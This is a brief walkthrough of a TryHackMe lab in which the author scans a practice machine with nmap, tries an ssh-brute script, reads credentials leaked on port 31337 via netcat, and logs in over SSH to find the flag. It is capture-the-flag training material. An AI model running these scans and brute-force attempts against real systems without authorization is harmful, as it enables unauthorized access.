Walkthrough: Intermediate Nmap - TryHackMe.
You’ve learned some great nmap skills! Now can you combine that with other skills with netcat and protocols, to log in to this machine and find the flag? This VM MACHINE_IP is listening on a high port, and if you connect to it it may give you some information you can use to connect to a lower port commonly used for remote access!
First I looked for open ports:
┌──(kali㉿kali)-[~/Documents]
└─$ nmap -sT 10.10.250.39 -vv
Those were:
PORT STATE SERVICE REASON 22/tcp open ssh syn-ack 2222/tcp open EtherNetIP-1 syn-ack 31337/tcp open Elite syn-ack
Then, since I’ve recently learnt about nmap scripts I first decided to try:
┌──(kali㉿kali)-[~/Documents]
└─$nmap -p 22 10.10.250.39 --script ssh-brute
but wasn’t able to get the credentials this way.
So I followed the instructions and interacted with the 31337 TCP port with netcat:
netcat -n 10.10.250.39 31337
which resulted in:
In case I forget - user:pass ubuntu:Dafdas!!/str0ng
With these credentials I was able to login via ssh:
┌──(kali㉿kali)-[~/Documents]
└─$ ssh ubuntu@10.10.250.39
and navigate to the flag.txt file.